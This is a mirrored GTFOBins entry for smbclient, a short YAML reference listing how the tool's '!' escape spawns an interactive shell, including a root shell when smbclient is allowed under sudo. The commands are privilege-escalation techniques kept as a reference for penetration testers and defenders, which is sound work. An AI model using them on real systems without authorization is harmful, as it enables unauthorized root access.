mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
13 lines
239 B
Markdown
13 lines
239 B
Markdown
|
---
|
||
|
description: A valid SMB/CIFS server must be available.
|
||
|
functions:
|
||
|
execute-interactive:
|
||
|
- code: |
|
||
|
smbclient \\ip\share
|
||
|
!/bin/sh
|
||
|
sudo-enabled:
|
||
|
- code: |
|
||
|
sudo smbclient \\ip\share
|
||
|
!/bin/sh
|
||
|
---
|